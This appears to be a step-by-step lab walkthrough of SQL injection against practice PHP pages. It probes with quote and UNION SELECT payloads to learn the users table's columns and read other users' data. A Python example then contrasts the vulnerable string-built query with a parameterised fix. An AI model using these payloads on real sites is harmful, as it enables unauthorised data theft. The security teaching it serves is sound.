list.php

  1. Try it.
    • View source
    • It calls view1.php?id=1 or id=2, so we know the ids and that the table is called users.
    • We know that Mickey Mouse's id is 1.

view1.php

  1. Try view1.php?id=3
    • No display
  2. Try view1.php?id=3'
    • You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 1' at line 1 in SELECT * FROM users WHERE id=3' LIMIT 1
    • So we now know the table name and the form of the SQL.
    • The LIMIT 1 is going to be a problem if we want to see everything.
  3. Try view1.php?id=1 AND XXX IS NULL
    • Unknown column 'XXX' in 'where clause' in SELECT * FROM users WHERE id=1 and barf IS NULL LIMIT 1
  4. Try view1.php?id=1 AND age IS NULL
    • age must be a field
  5. There's a name, probably first and last. Try some other things.
    • Maybe we find first_name and last_name, maybe not.
  6. Can we determine the number of columns? Try id=1 union all select 1
    • Get an error, so there's more than one column; by trial and error, we find there are 4 columns.
  7. Try: id=1 union all select 1,2,3,4 from users;
    • First name is column 2, last name is column 3, id and age are 1 and 4.
  8. Try: id=1 union all select age,age,age,age from users;
    • We get Mickey Mouse as before
  9. Try: id=99 union all select age,age,age,age from users;
    • We get 81,81. That's probably the age of the first user.
  10. Try: id=99 union all select age,age,age,age from users where id=1; --
    • Get 81,81
  11. Try: id=99 union all select age,age,age,age from users where id=2; --
    • Get the age of the user with id=2
    • Or try with first_name
  12. Mickey is 81
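The query shape that the step 2 error reveals, shown as an added example that is not the lab's own code: a Python/sqlite3 stand-in for view1.php, with the string-built query beside a version that validates and binds the id. The users table and its rows are constructed here; the column names follow steps 4 and 5.

```python
import sqlite3

# Constructed sample data standing in for the lab's users table: (id, first_name, last_name, age).
SAMPLE_USERS = [
    (1, "Mickey", "Mouse", 81),
    (2, "Donald", "Duck", 79),
]


def make_db():
    """Build an in-memory table with the four columns the walkthrough found."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, first_name TEXT, last_name TEXT, age INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def view_vulnerable(conn, user_id):
    """Mirrors what view1.php evidently does: the id parameter is pasted into the SQL text.

    Returns the rows, or the raw database error text, which is exactly what
    step 2 of the walkthrough relies on to learn the query shape.
    """
    sql = f"SELECT * FROM users WHERE id={user_id} LIMIT 1"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return f"error: {exc}"


def view_hardened(conn, user_id):
    """Same lookup, but the id is validated as an integer and bound as a parameter.

    Anything that is not a plain integer (3', 1 AND age IS NULL, 99 union all ...)
    is treated as "no such row" and never reaches the SQL text, and no database
    error message is returned to the client.
    """
    try:
        uid = int(user_id)
    except (TypeError, ValueError):
        return []
    return conn.execute("SELECT * FROM users WHERE id=? LIMIT 1", (uid,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    probe = "99 union all select age,age,age,age from users"
    print("vulnerable:", view_vulnerable(db, probe))   # leaks (81, 81, 81, 81)
    print("hardened:  ", view_hardened(db, probe))     # []
```

In the hardened version the error branch deliberately returns an empty result rather than the exception text, since the leaked MySQL message in step 2 is what made the table name and LIMIT 1 visible in the first place.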

Now try the other views